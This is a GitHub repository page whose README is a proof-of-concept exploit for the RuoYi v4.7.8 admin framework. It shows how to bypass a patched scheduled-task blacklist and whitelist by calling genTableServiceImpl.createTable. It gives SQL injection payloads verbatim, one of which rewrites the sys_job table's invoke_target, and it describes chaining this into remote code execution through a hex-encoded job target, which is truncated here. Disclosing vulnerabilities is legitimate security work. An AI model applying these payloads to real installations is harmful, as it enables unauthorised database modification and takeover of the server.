Skip to content

luelueking/RuoYi-v4.7.8-RCE-POC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 

Repository files navigation

RuoYi-v4.7.8-RCE-POC

The system had vulnerabilities in the scheduled tasks before, and now I bypass it.

Sqli

In the patch, a strategy using blacklisting and whitelisting was employed.

截屏2024-02-25 15.22.37

However, I managed to bypass it by using a whitelist class and successfully carried out an SQL injection.

genTableServiceImpl.createTable('SELECT 1 FROM 'Hack By 1ue';')

img

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 'Hack By 1ue' WHERE job_id = 1;')

img

success to change the data of table job_id

RCE

JobInvokeUtildoes not allow parentheses in the string during invocation, so I modified the parameter value of a specific job in the original job table to hexadecimal (bypassing defense detection), enabling another scheduled task for Remote Code Execution (RCE).

img

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a61... WHERE job_id = 2;')

截屏2024-02-25 15.18.34

the job's invoke_target changed

img

and then execute!

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published